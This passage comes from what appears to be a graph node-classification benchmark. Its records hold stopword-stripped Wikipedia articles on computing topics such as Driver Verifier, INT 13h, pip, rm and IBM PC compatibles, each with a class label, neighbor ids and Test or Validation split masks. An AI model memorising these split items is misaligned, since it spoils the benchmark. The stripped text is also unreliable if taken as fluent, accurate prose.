last bitmap rendered buffer application minimized starting windows 7 canonical display driver longer renders system memory copy wddm 1.1/dxgi 1.1 compliant video driver present applications using directx write 3d surface directx implementation windows vista uses wddm share surface dwm dwm uses surface directly maps window meshes windows presentation foundation wpf applications directx applications compositor renders shared surfaces composited final desktop applications mix either rendering technique across multiple child windows long gdi directx used render window case ordering directx gdi rendering guaranteed guaranteed gdi bitmap system memory translated video memory surface means final composition may contain gdi-rendered elements prevent dwm temporarily turned long application mixes gdi directx window running windows vista dwm requires compatible physical virtual hardware windows 7 desktop window manager reworked use direct3d 10.1 hardware requirements remain windows vista direct3d 9 hardware supported 10 level 9 layer introduced direct3d 11 runtime windows 8 requirements 7 also use software rendering compatible video hardware absent hardware virtualization software emulate hardware required dwm include virtualbox 4.1 later vmware fusion 3.0 later vmware workstation 7.0 onwards addition windows virtual pc allows composition using remote desktop protocol",
    "neighbors": [
      10243,
      6150,
      11270,
      5643,
      4624,
      10769,
      9234,
      1043,
      537,
      540,
      3102,
      1055,
      9762,
      2083,
      8227,
      8740,
      11300,
      1577,
      10281,
      1581,
      4143,
      9263,
      11316,
      1077,
      2101,
      8246,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      9813,
      10839,
      603,
      9819,
      2145,
      3170,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      10886,
      2183,
      8841,
      651,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3224,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      5300,
      9910,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      3283,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      11487,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      10991,
      10993,
      2804,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      9491,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      4384,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      5952,
      3394,
      1348,
      844,
      3922,
      4439,
      5465,
      10079,
      11616,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      9609,
      1418,
      5003,
      5004,
      9612,
      8080,
      9114,
      11677,
      10654,
      8607,
      929,
      10658,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      2493,
      2495,
      960,
      7106,
      8132,
      6088,
      969,
      7629,
      3535,
      8659,
      9173,
      1498,
      5594,
      478,
      8161,
      6115,
      9196,
      6637,
      4590,
      9709,
      11247,
      6641,
      3573,
      10229,
      10747,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 6115,
    "label": 2,
    "text": "Driver_Verifier:driver verifier driver verifier tool included microsoft windows replaces default operating system subroutines ones specifically developed catch device driver bugs enabled monitors stresses drivers detect illegal function calls actions may causing system corruption acts within kernel mode target specific device drivers continual checking make driver verifier functionality multithreaded several device drivers stressed time simulate certain conditions low memory i/o verification pool tracking irql checking deadlock detection dma checks irp logging etc verifier works forcing drivers work minimal resources making potential errors might happen rarely working system manifest immediately typically fatal system errors generated stressed drivers test environment producing core dumps analysed debugged immediately without stressing intermittent faults would occur field without proper troubleshooting facilities personnel driver verifier verifier.exe first introduced command-line utility windows 2000 windows xp gained easy-to-use graphical user interface called driver verifier manager makes possible enable standard custom set settings select drivers test verify new windows version since introduced several new stringent checks testing verifying drivers detecting new classes driver defects driver verifier normally used machines used productive work cause undetected relatively harmless errors drivers manifest especially ones digitally signed windows hardware quality labs causing blue screen fatal system errors also causes resource-starved drivers underperform slow general operation constraints imposed verifier reversed debugging microsoft recommends verifying drivers time",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      4668,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 6116,
    "label": 2,
    "text": "Olivetti_X/OS:olivetti x/os x/os unix computer manufacturer olivetti based 4.2bsd unix system v support ran lsx line computers based motorola 68000-series cpus",
    "neighbors": [
      7269,
      7983,
      2995,
      5492,
      9151
    ],
    "mask": "None"
  },
  {
    "node_id": 6117,
    "label": 3,
    "text": "SigmaTel_STMP3700:sigmatel stmp3700 sigmatel stmp3700 low power system chip made pmp portable media players stmp3700 using single arm processor core clocked maximum 300 mhz system chip developed 2007 use portable media players supports playing video qvga decoding various media formats used creative zen 2007 creative zen x-fi 2008 stmp378x supports vga resolutions 640×480 higher clock frequencies video hardware assist sony walkman models using product line include salsa newton freed appeared ces 2009 see freescale stmp3700 series site info",
    "neighbors": [
      9964
    ],
    "mask": "Test"
  },
  {
    "node_id": 6118,
    "label": 3,
    "text": "INT_13H:int 13h int 13h shorthand bios interrupt call 13 20th interrupt vector x86-based computer system bios typically sets real mode interrupt handler vector provides sector-based hard disk floppy disk read write services using cylinder-head-sector chs addressing int x86 instruction triggers software interrupt 13 interrupt number hexadecimal value called modern computers come bios int 0x13 uefi functionality provides services exception uefi class 3 completely removes csm thus lacks int 13h interrupts typically uefi drivers use lba-addressing instead chs-addressing real mode operating systems dos calling int 13h would jump computer rom-bios code low-level disk services would carry physical sector-based disk read write operations program dos serves low-level interface built-in block device drivers hard disks floppy disks allows int 25h int 26h provide absolute disk read/write functions logical sectors fat file system driver dos kernel handles file-related requests dos api int 21h functions protected mode operating systems microsoft windows nt derivatives e.g nt4 2000 xp server 2003 linux dosemu os intercepts call passes operating system native disk i/o mechanism windows 9x windows workgroups 3.11 also bypass bios routines using 32-bit file access original bios real-mode int 13h interface supports drives sizes 504 mb using commonly referred physical chs addressing limit originates hardware interface ibm pc/xt disk hardware bios used cylinder-head-sector chs address given int 13h call transferred directly hardware interface interface later extended support addressing exactly 8064 mb using commonly referred logical chs addressing limit originates combination register value based calling convention used int 13h interface goal maintaining backward compatibility originally number bioses offered incompatible versions interface eventually computer industry standardized interface developed microid research mr bios 1989 limit uses 1024 cylinders 256 heads 63 sectors 512 byte blocks allowing exactly 7.875 gib addressing 1024 256 63 512 bytes support even larger addressing modes interface known int 13h extensions introduced western digital phoenix technologies part bios enhanced disk drive services edd uses 64-bit logical block addressing lba allows addressing 8 zib drive also support 28-bit 48-bit lba allows 128 gib 128 pib respectively assuming 512-byte sector/block size packet interface uses pointer packet information rather register based calling convention original int 13h interface packet data structure contains interface version data size lbas versions ms-dos including ms-dos 7 windows 95 bug prevents booting disk drives 256 heads register value 0xff many modern bioses provide mappings 255 0xfe heads thus reducing total addressable space exactly 8032.5 mib approx 7.844 gib cache drivers flush buffers detecting dos bypassed directly issuing int 13h applications dummy read used one several methods force cache flushing unknown caches e.g rebooting ami bioses around 1990–1991 trash word unaligned buffers dos tsr programs clobber interrupt enabling registers pc dos ms-dos install filters prevent award bios ami 386sx bios extended handle 1024 cylinders placing bits 10 11 cylinder number bits 6 7 dh second column empty function may used floppy hard disk bit 7=0 floppy drive bit 7=1 fixed drive register cx contains cylinder number 10 bits possible values 0 1023 sector number 6 bits possible values 1 63 cylinder sector bits numbered examples translation addressing buffer guarantee complete buffer inside given segment i.e codice_1 otherwise interrupt may fail bios hardware versions assume want read 16 sectors 2000h bytes buffer starts memory address 4ff00h utilizing memory segmentation different ways calculate register values e.g function 02h interrupt 13h may read sectors first 16,450,560 sectors hard drive read sectors beyond 8 gb limit use function 42h extensions another alternate may dos interrupt 25h reads sectors within partition difference function function 02h see function 0ah reads 516 bytes per sector instead 512 last 4 bytes contains error correction code ecc checksum sector data physical chs values function 48h may/should differ logical values function 08h",
    "neighbors": [
      5312,
      9762,
      389,
      4424,
      1515,
      7501,
      9166,
      9791,
      5823,
      499,
      4563,
      823,
      5080,
      4441,
      5596,
      9597,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 6119,
    "label": 2,
    "text": "Pip_(package_manager):pip package manager pip de facto standard package-management system used install manage software packages written python many packages found default source packages dependencies — python package index pypi distributions python come pip preinstalled python 2.7.9 later python2 series python 3.4 later include pip pip3 python 3 default pip recursive acronym pip installs packages one major advantage pip ease command-line interface makes installing python software packages easy issuing command users also easily remove package importantly pip feature manage full lists packages corresponding version numbers possible requirements file permits efficient re-creation entire group packages separate environment e.g another computer virtual environment achieved properly formatted file following command codice_1 name file install package specific version python codice_2 replaced 2 3 3.4 etc",
    "neighbors": [
      8068,
      11525,
      3462,
      8582,
      10760,
      5130,
      2955,
      7435,
      6797,
      7947,
      9487,
      788,
      1813,
      5397,
      8213,
      6680,
      10900,
      10394,
      8476,
      9245,
      5155,
      5670,
      4775,
      7722,
      6828,
      5677,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      5819,
      10172,
      190,
      9151,
      3777,
      10817,
      8644,
      9671,
      5578,
      5067,
      3918,
      463,
      4302,
      5070,
      2259,
      3667,
      6227,
      4951,
      6361,
      2010,
      9564,
      8413,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      2281,
      8554,
      9063,
      5612,
      9324,
      9455,
      10096,
      1138,
      1522,
      9842,
      3573,
      2168,
      6393,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 6120,
    "label": 6,
    "text": "Rm_(Unix):rm unix computing codice_1 short remove basic command unix unix-like operating systems used remove objects computer files directories symbolic links file systems also special files device nodes pipes sockets similar codice_2 command ms-dos os/2 microsoft windows command also available efi shell codice_1 command removes references objects filesystem using unlink system call objects might multiple references example file two different names objects discarded references removed programs still open handles objects allows scenarios program open file immediately remove filesystem use temporary space knowing file space reclaimed program exits even exits crashing command generally destroy file data since purpose really merely unlink references filesystem space freed may still contain leftover data removed file security concern cases hardened versions sometimes provide wiping data last link cut programs shred srm available specifically provide data wiping capability codice_1 generally seen unix-derived operating systems typically provide recovery deleted files mechanism like recycle bin hence tendency users enclose codice_1 kind wrapper limit accidental file deletion undelete utilities attempt reconstruct index bring file back parts reused old versions unix codice_1 command would delete directories empty behaviour still obtained versions codice_1 codice_8 flag e.g. bsds freebsd netbsd openbsd macos derived 4.4bsd-lite2 version codice_1 bundled gnu coreutils written paul rubin david mackenzie richard stallman jim meyering version also provides codice_8 option help compatibility functionality provided standard codice_11 command codice_12 option version 7 replaced codice_13 delete switches debuted version 1 doug mcilroy wrote codice_13 desperation tool designed clean files unutterable names kolibrios includes implementation command codice_1 deletes file specified options added users use full path relative file path specify files delete codice_1 n't delete directory default deletes file foo directory user currently codice_1 like commands uses options specify behave codice_1 overlain shell alias c shell alias bourne shell bash function codice_27 avoid accidental deletion files user still wishes delete large number files without confirmation manually cancel codice_12 argument adding codice_20 option option specified later expanded command line codice_30 takes precedence unfortunately approach generates dangerous habits towards use wildcarding leading version accidental removals codice_31 variously codice_32 codice_33 others frequently used jokes anecdotes unix disasters. ref name= linux/unix delete file /ref codice_32 variant command run superuser would cause every file accessible present file system deleted machine codice_1 often used conjunction xargs supply list files delete remove png images directories current one usually filesystems deleting file requires write permission parent directory execute permission order enter directory first place note confusingly beginners permissions file irrelevant however gnu codice_1 asks confirmation write-protected file deleted unless -f option used delete directory codice_37 one must delete contents recursively requires one must read write execute permission directory empty non-empty subdirectories recursively read permissions needed list contents directory order delete sometimes leads odd situation non-empty directory deleted one n't write permission delete contents directory empty one would able delete file resides directory sticky bit set deleting file requires one owner file sun microsystems introduced codice_32 protection solaris 10 first released 2005 upon executing command system reports removal allowed shortly functionality introduced freebsd version codice_1 utility gnu codice_1 refuses execute codice_32 codice_42 option given default since version 6.4 gnu core utilities released 2006 newer systems failsafe always active even without option run command user must bypass failsafe adding option codice_43 even superuser systems administrators designers even users often attempt defend accidentally deleting files creating alias function along lines results codice_1 asking user confirm file-by-file basis whether deleted pressing n key unfortunately tends train users careless wildcards hand codice_1 commands well encouraging tendency alternately pound codice_46 return key affirm removes past one file needed keep users even seen going far codice_47 automatically inserts yes file compromise allows users confirm encourages proper wildcarding makes verification list easier achieved something like important note function made shell script would run risk found ahead system codice_1 search path allowed non-interactive shells could break batch jobs enclosing definition codice_49 construct protects latter exist third-party alternatives prevent accidental deletion important files safe-rm trash gnu core utilities implementation used multiple linux distributions limited command line arguments bytes number pages allocated within kernel command-line arguments kernel 2.6.23 released 9 october 2007 defined kernel compile time variable codice_50 codice_51 file new kernels limits maximum argument length 25 maximum stack limit ulimit -s error codice_52 prompt command-line argument limit exceed",
    "neighbors": [
      515,
      516,
      9733,
      9735,
      6664,
      521,
      8729,
      7196,
      9762,
      2599,
      8236,
      5706,
      3659,
      9298,
      1109,
      8306,
      5759,
      5256,
      6281,
      6797,
      4750,
      10387,
      2198,
      6812,
      7325,
      7847,
      700,
      7356,
      2245,
      1741,
      10967,
      9946,
      6369,
      9444,
      11494,
      4850,
      10484,
      8954,
      8975,
      4369,
      5397,
      10016,
      808,
      4398,
      7983,
      8499,
      1336,
      8504,
      6459,
      10564,
      8517,
      9542,
      8522,
      5969,
      1902,
      5492,
      2432,
      3976,
      11663,
      4001,
      9151,
      9665,
      3522,
      451,
      1987,
      965,
      9166,
      8675,
      2534,
      10727,
      491,
      10732,
      11249,
      5106,
      506,
      8692,
      9204,
      6138
    ],
    "mask": "None"
  },
  {
    "node_id": 6121,
    "label": 3,
    "text": "Full_Throttle_(1984_video_game):full throttle 1984 video game full throttle video game released 1984 zx spectrum msx player races 500cc grand prix motorcycle ten world top racing circuits selecting track race player starts back grid 39 bikes cornering quickly cause skid running road slow bike making contact another rider forces bike halt allowing following riders stream past player bike gets going ten circuits game part key winning know circuit well enough predict bends practice mode player rides round track without riders player choose race one five laps best position achieved shown bottom menu-screen along player time ahead second-place man soon track number laps changed record reset game written mervyn estcourt creator 3d deathchase reviews positive crash giving 91 crash smash spectrum rating 4/5 computer video games sinclair user rating 8/10",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6122,
    "label": 8,
    "text": "Mod_qos:mod qos mod_qos quality service qos module apache http server implementing control mechanisms provide different priority different requests web server serve limited number concurrent requests qos used ensure important resources stay available high server load mod_qos used reject requests unimportant resources granting access important applications also possible disable access restrictions example requests important resources important users control mechanisms available following levels module useful used reverse proxy order divide resources different webserver first use case shows mod_qos avoid service outage web server due slow responses single application case application /ccc slow requests wait timeout occurs due many waiting requests web server runs free tcp connections able process requests application /aaa /bbb mod_qos limits concurrent requests application order assure availability resources keep-alive extension http 1.1 allows persistent tcp connections multiple request/responses accelerates access web server due less optimised network traffic disadvantage persistent connections server resources blocked even though data exchanged client server mod_qos allows server support keep-alive long sufficient connections free stopping keep-alive support defined connection threshold reached single client may open many simultaneous tcp connections order download different content web server client gets many connections users may able access server since free connections remain mod_qos limit number concurrent connections single ip source address limit number requests url mod_qos help mod_qos limits maximum number requests per second url module may also control bandwidth simply specify maximum allowed bandwidth moq_qos starts throttling becomes necessary mod_qos may help protect apache web server low-bandwidth dos attacks enforcing minimum upload/download throughput client must generate initial release mod_qos created may 2007 published sourceforge.net open source software project able limit number concurrent http requests specified resources path portion request urls web server features added useful protect apache servers dos attacks 2012 mod_qos included ubuntu linux distribution major releases",
    "neighbors": [
      2945,
      2409,
      5612,
      2060,
      7983,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6123,
    "label": 8,
    "text": "Law360:law360 law360 subscription-based legal news service operated portfolio media company subsidiary lexisnexis marius meland founded portfolio media october 2003 2004 began publishing daily online newsletter intellectual property law later named law360 march 20 2012 company acquired lexisnexis meland hoglund serving co-ceos publication 11 news bureaus across u.s",
    "neighbors": [
      5919
    ],
    "mask": "None"
  },
  {
    "node_id": 6124,
    "label": 1,
    "text": "Partition_(database):partition database partition division logical database constituent elements distinct independent parts database partitioning normally done manageability performance availability reasons load balancing popular application partitioning distributed database management system partition may spread multiple nodes users node perform local transactions partition increases performance sites regular transactions involving certain views data whilst maintaining availability security current high end relational database management systems provide different criteria split database take partitioning key assign partition based certain criteria common criteria partitioning done either building separate smaller databases tables indices transaction logs splitting selected elements example one table horizontal partitioning involves putting different rows different tables example customers zip codes less 50000 stored customerseast customers zip codes greater equal 50000 stored customerswest two partition tables customerseast customerswest view union might created provide complete view customers vertical partitioning involves creating tables fewer columns using additional tables store remaining columns normalization also involves splitting columns across tables vertical partitioning goes beyond partitions columns even already normalized different physical storage might used realize vertical partitioning well storing infrequently used wide columns different device example method vertical partitioning done explicitly implicitly type partitioning called row splitting row split columns common form vertical partitioning split dynamic data slow find static data fast find table dynamic data used often static creating view across two newly created tables restores original table performance penalty however performance increase accessing static data e.g statistical analysis taken ultimate end results something like columnar database",
    "neighbors": [
      8195,
      10632,
      8201,
      11400,
      8979,
      2068,
      10389,
      4630,
      7446,
      2456,
      1049,
      5658,
      5403,
      9112,
      10137,
      11030,
      4255,
      9248,
      9631,
      9634,
      11552,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      9782,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      2246,
      9286,
      2632,
      9290,
      11343,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      8539,
      734,
      4065,
      1636,
      9828,
      10340,
      10471,
      8808,
      2669,
      7022,
      6383,
      2544,
      10737,
      9075,
      7412,
      1142,
      1146,
      2555,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 6125,
    "label": 4,
    "text": "Team8:team8 team8 cyber security company based tel aviv israel describes think tank company creation platform news partnership intel via spin company illusive networks citigroup microsoft qualcomm amongst others also news receiving funding bessemer venture partners company founded 2014 ronni zehavi liran grinberg israel grimberg nadav zafrir three former leaders israel ’ military intelligence unit 8200 understood illusive networks built solution advanced persistent threats apts building false “ virtual networks ” designed lure trick trap malicious hackers partnership microsoft believed researching cybersecurity challenges former nsa director admiral mike rogers joined israeli think tank october 2018 becoming member board advisers",
    "neighbors": [
      9863
    ],
    "mask": "None"
  },
  {
    "node_id": 6126,
    "label": 6,
    "text": "Filename_mangling:filename mangling process filename mangling computing involves translation file name compatibility operating system level occurs filename filesystem appears form incompatible operating system accessing mangling occurs example computer networks windows machine attempts access file unix server file filename includes characters valid windows common example name mangling occurs vfat file systems versions windows windows 95 onwards vfat specification allows long file names lfns backwards-compatibility ms-dos older windows software recognizes filenames maximum 11 characters length 8.3 format i.e eight-letter filename dot three-letter extension codice_1 files lfns get stored disk 8.3 format codice_2 becoming codice_3 long file name stored elsewhere disk normally using compatible windows programs use standard windows methods reading disk i/o subsystem returns long filename program — however old dos application old windows application tries address file use older 8.3-only apis work lower level perform disk access results return 8.3 filename case filenames become mangled taking first six non-space characters filename adding tilde number ensure uniqueness 8.3 filename disk mangling scheme turn example codice_4 codice_5 technique persists today people use dosbox play classic dos games use windows 3.1 conjunction play win16 games 64-bit windows unix file names contain colons backslashes whereas windows interprets characters ways accordingly software could mangle unix file notes 11\\04\\03 notes_ 11-04-03 enable windows software remotely access file unix-like systems samba unix use different mangling systems map long filenames dos-compatible filenames although samba administrators configure behavior config file macos finder displays instances file directory names classic mac os used character internally path separator listing files directories using terminal emulator displays rather character though",
    "neighbors": [
      2432,
      3330,
      5514,
      6797,
      5397,
      8988,
      6813,
      9762,
      5158,
      1193,
      7983,
      52,
      1844,
      1724,
      9533,
      576,
      3522,
      9166,
      5969,
      6358,
      5975,
      1509,
      7663,
      9840,
      3571,
      5492,
      7540
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6127,
    "label": 8,
    "text": "JSON-RPC:json-rpc json-rpc remote procedure call protocol encoded json simple protocol similar xml-rpc defining data types commands json-rpc allows notifications data sent server require response multiple calls sent server may answered order json-rpc works sending request server implementing protocol client case typically software intending call single method remote system multiple input parameters passed remote method array object whereas method return multiple output data well depends implemented version transfer types single objects serialized using json request call specific method provided remote system must contain three certain properties receiver request must reply valid response received requests response must contain properties mentioned since situations response needed even desired notifications introduced notification similar request except id needed response returned case codice_3 property omitted version 2.0 codice_8 version 1.0 examples codice_9 denotes data sent service request codice_10 denotes data coming service although codice_10 often called response client–server computing depending json-rpc version necessarily imply answer request request response notification response request response request response category json category web services category remote procedure call",
    "neighbors": [
      9441,
      11105,
      803,
      10020,
      7338,
      6993,
      10486,
      5915,
      3839
    ],
    "mask": "Test"
  },
  {
    "node_id": 6128,
    "label": 2,
    "text": "Hardware_abstraction:hardware abstraction hardware abstractions sets routines software emulate platform-specific details giving programs direct access hardware resources often allow programmers write device-independent high performance applications providing standard operating system os calls hardware process abstracting pieces hardware often done perspective cpu type cpu specific instruction set architecture isa isa represents primitive operations machine available use assembly programmers compiler writers one main functions compiler allow programmer write algorithm high-level language without care cpu-specific instructions job compiler generate cpu-specific executable type abstraction made operating systems os apis represent primitive operations machine rather isa allows programmer use os-level operations e.g task creation/deletion programs retaining portability variety different platforms many early computer systems form hardware abstraction meant anyone writing program system would know hardware device communicated rest system significant challenge software developers since know every hardware device system worked ensure software compatibility hardware abstraction rather program communicating directly hardware device communicates operating system device generates hardware-dependent instruction device meant programmers n't need know specific devices worked making programs compatible device example might joystick abstraction joystick device many physical implementations readable/writable api many joystick-like devices might share joystick-devices might report movement directions many joystick-devices might sensitivity-settings configured outside application joystick abstraction hides details e.g. register format i2c address hardware programmer using abstracted api need understand details device physical interface also allows code reuse since code process standardized messages kind implementation supplies joystick abstraction nudge forward potentiometer capacitive touch sensor recognises swipe gestures long provide signal related movement physical limitations e.g resolution sensor temporal update frequency may vary hardware api little hide assuming least common denominator model thus certain deep architectural decisions implementation may become relevant users particular instantiation abstraction good metaphor abstraction transportation bicycling driving car transportation commonalities e.g. must steer physical differences e.g. use feet one always specify abstraction drive let implementor decide whether bicycling driving car best wheeled terrestrial transport function abstracted details drive encapsulated examples abstractions pc include video input printers audio input output block devices e.g hard disk drives usb flash drive etc certain computer science domains operating systems embedded systems abstractions slightly different appearances instance operating systems tend standardized interfaces concept abstraction encapsulation complexity common deep hardware abstraction layer reside application programming interface api software stack whereas application layer often written high level language resides api communicates hardware calling functions api hardware abstraction layer hal abstraction layer implemented software physical hardware computer software runs computer function hide differences hardware operating system kernel kernel-mode code need changed run systems different hardware pc hal basically considered driver motherboard allows instructions higher level computer languages communicate lower level components prevents direct access hardware cp/m cp/m bios dos dos bios solaris linux bsd macos portable operating systems also hal even explicitly designated operating systems linux ability insert one running like adeos netbsd operating system widely known clean hardware abstraction layer allows highly portable part system subsystems popular buses used one architecture also abstracted isa eisa pci pcie etc. allowing drivers also highly portable minimum code modification operating systems defined hal easily portable across different hardware especially important embedded systems run dozens different platforms windows nt kernel hal kernel space hardware executive services contained file ntoskrnl.exe windows \\system32\\hal.dll allows portability windows nt kernel-mode code variety processors different memory management unit architectures variety systems different i/o bus architectures code runs without change systems compiled instruction set applicable systems example sgi intel x86-based workstations ibm pc compatible workstations due hal windows 2000 able run since windows vista windows server 2008 hal used automatically determined startup extreme example hal found system/38 as/400 architecture compilers systems generate abstract machine code licensed internal code lic translates virtual machine code native code processor running executes resulting native code exceptions compilers generate lic compilers available outside ibm successful application software operating system software lic layer compiled original s/38 run without modification without recompilation latest as/400 systems despite fact underlying hardware changed dramatically least three different types processors use android introduced hal known vendor interface codenamed project treble version 8.0 oreo abstracts low-level code android os framework must made forward compatible support future versions android ease development firmware updates.. android hal existed even",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      3631,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      1126,
      6760,
      10856,
      8298,
      9835,
      8301,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      3235,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      6377,
      7403,
      5358,
      242,
      5363,
      5368,
      9466,
      2811,
      9468,
      1278,
      1791,
      10494,
      6403,
      10499,
      1804,
      8976,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      6979,
      10051,
      11075,
      4423,
      5452,
      6988,
      11596,
      5457,
      11601,
      7507,
      3412,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      3445,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      1952,
      421,
      1445,
      935,
      4521,
      9643,
      2476,
      4525,
      11184,
      7601,
      10676,
      5049,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      477,
      10730,
      10731,
      5100,
      8687,
      5105,
      6129,
      5619,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 6129,
    "label": 3,
    "text": "IBM_PC_compatible:ibm pc compatible ibm pc compatible computers computers similar original ibm pc xt able use software expansion cards computers referred pc clones ibm clones duplicate almost exactly significant features pc architecture facilitated ibm choice commodity hardware components various manufacturers ability reverse engineer bios firmware using clean room design technique columbia data products built first clone ibm personal computer clean room implementation bios early ibm pc compatibles used computer bus original pc models ibm compatible bus later named industry standard architecture isa bus manufacturers compatible computers term ibm pc compatible historical description since ibm ended personal computer sales descendants ibm pc compatibles comprise majority personal computers market presently dominant operating system microsoft windows although interoperability bus structure peripherals original pc architecture may limited non-existent computers ran ms-dos enough hardware differences ibm compatible software could used examples include slight differences memory map serial ports video hardware macintosh kept significant market share without compatibility ibm pc ibm decided 1980 market low-cost single-user computer quickly possible 12 august 1981 first ibm pc went sale three operating systems os available least expensive popular pc dos made microsoft crucial concession ibm agreement allowed microsoft sell version ms-dos non-ibm computers component original pc architecture exclusive ibm bios basic input/output system ibm first asked developers avoid writing software addressed computer hardware directly instead make standard calls bios functions carried hardware-dependent operations software would run machine using ms-dos pc-dos software directly addressed hardware instead making standard calls faster however particularly relevant games software addressing ibm pc hardware way would run ms-dos machines different hardware ibm pc sold high enough volumes justify writing software specifically encouraged manufacturers produce machines could use programs expansion cards peripherals pc 808x computer marketplace rapidly excluded machines hardware- software-compatible pc 640 kb barrier conventional system memory available ms-dos legacy period non-clone machines subject limit could exceed 640 kb rumors lookalike compatible computers created without ibm approval began almost immediately ibm pc release infoworld wrote first anniversary ibm pc june 1983 pc magazine defined pc 'clone computer accommodate user takes disk home ibm pc walks across room plugs 'foreign machine shortage ibm pcs year many customers purchased clones instead columbia data products produced first computer less compatible ibm pc standard june 1982 soon followed eagle computer compaq announced first ibm pc compatible november 1982 compaq portable compaq first sewing machine-sized portable computer essentially 100 pc-compatible company could copy bios directly result court decision apple v. franklin could reverse-engineer ibm bios write bios using clean room design time many manufacturers tandy/radioshack xerox hewlett-packard digital equipment corporation sanyo texas instruments tulip wang olivetti introduced personal computers supported ms-dos completely software- hardware-compatible ibm pc tandy described tandy 2000 example 'next generation true 16-bit cpu speed disk storage expansion ibm pc ms-dos computers admitting 1984 many ms-dos programs support computer company stated popular sophisticated software market available either immediately next six months like ibm microsoft intention application writers would write application programming interfaces ms-dos firmware bios would form would termed hardware abstraction layer computer would original equipment manufacturer oem version ms-dos customized hardware software written ms-dos would operate ms-dos computer despite variations hardware design expectation seemed reasonable computer marketplace time microsoft based primarily computer languages basic established small system operating software cp/m digital research use hobbyist level professional using microcomputers achieve widespread use thus make product viable economically os operate across range machines different vendors widely varying hardware customers needed applications starter programs could reasonably expect publishers offer products variety computers suitable media microsoft competing os intended initially operate similar varied spectrum hardware although based 8086 processor thus ms-dos several years sold oem product microsoft-branded ms-dos ms-dos could purchased directly microsoft oem release packaged trade dress given pc vendor malfunctions reported oem microsoft however machines compatible ibm hardware—thus supporting direct calls hardware—became widespread soon became clear oem versions ms-dos virtually identical except perhaps provision utility programs ms-dos provided adequate functionality character-oriented applications could implemented text-only terminal bulk commercially important software nature low-level hardware compatibility might mattered however order provide maximum performance leverage hardware features work around hardware bugs pc applications quickly developed beyond simple terminal applications ms-dos supported directly spreadsheets wysiwyg word processors presentation software remote communication software established new markets exploited pc strengths required capabilities beyond ms-dos provided thus early development ms-dos software environment many significant commercial software products written directly hardware variety reasons may 1983 future computing defined four levels compatibility development compaq engineers found microsoft flight simulator would run sublogic bruce artwick described bug one intel chips forcing make new computer bug compatible ibm pc first clones compaq offered truly full compatibility jerry pournelle purchased ibm pc mid-1983 rotten keyboard four cubic feet unevaluated software much wo n't run anything ibm pc although lot machines claim 100 percent 